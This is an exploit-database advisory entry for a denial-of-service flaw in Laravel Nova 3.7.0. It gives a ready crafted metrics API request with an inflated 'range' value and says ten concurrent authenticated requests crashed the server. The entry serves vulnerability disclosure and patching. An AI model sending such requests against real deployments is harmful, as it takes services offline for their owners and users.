Laravel Nova 3.7.0 - 'range' DoS

Author: iqzer0
type: webapps
platform: php
port: 
date_added: 2020-12-04 
date_updated: 2020-12-04 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Laravel Nova 3.7.0 - 'range' DoS
# Date: June 22, 2020
# Exploit Author: iqzer0
# Vendor Homepage: https://nova.laravel.com/
# Software Link: https://nova.laravel.com/releases
# Version: Version v3.7.0
# Tested on: Manjaro / Chrome v83

An authenticated user can crash the application by setting a higher
value to the 'range' (default 30) parameter and sending simultaneous
requests (10 simultaneous requests was enough to DoS the server in my
testing)

Vulnerable URL:
https://example.com/nova-api/metrics/sum-orders?timezone=Indian%2FMaldives&twelveHourTime=true&range=3000000
Vulnerable Parameter: range